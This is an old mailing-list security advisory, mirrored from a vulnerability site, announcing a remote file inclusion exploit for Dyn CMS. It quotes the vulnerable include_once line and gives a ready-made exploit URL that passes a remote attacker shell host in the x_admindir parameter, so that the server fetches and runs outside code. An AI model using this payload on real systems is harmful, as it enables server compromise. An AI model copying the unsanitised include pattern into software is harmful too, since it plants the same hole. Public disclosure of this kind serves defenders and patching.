Security Advisory: Dyn CMS <= REleased (x_admindir) Remote File Inclusion Exploit

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  SimpleBlog <= 2.3 (id) Remote SQL Injection Vulnerability
  The Amazing Little Poll Admin Pwd
  [SA21653] PHP-Nuke MyHeadlines Module "myh_op" Cross-Site Scripting
  [SA21742] microforum "members.
dat" Exposure of User Credentials

From: SHiKaA-_(at)_hotmail.com <SHiKaA-_(at)_hotmail.com>
Date: 04.09.2006
Subject: Dyn CMS <= REleased (x_admindir) Remote File Inclusion Exploit

#================================================================================
==============
#Dyn CMS <= REleased (x_admindir) Remote File Inclusion Exploit
#================================================================================
===============
#
#Critical Level : Dangerous
#
#Venedor site : http://www.dyncms.com/
#
#Version : REleased
#
#================================================================================
================
#Bug in : 0_admin/modules/Wochenkarte/frontend/index.php
#
#Vlu Code :
#--------------------------------
#     include_once($x_admindir."/modules/".$xmodulname.
"/frontend/tools.inc.php");
#
#
#================================================================================
================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir= class="fixed">http://SHELLURL.COM?
#
#================================================================================
================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior
=================================================================================
=================

test server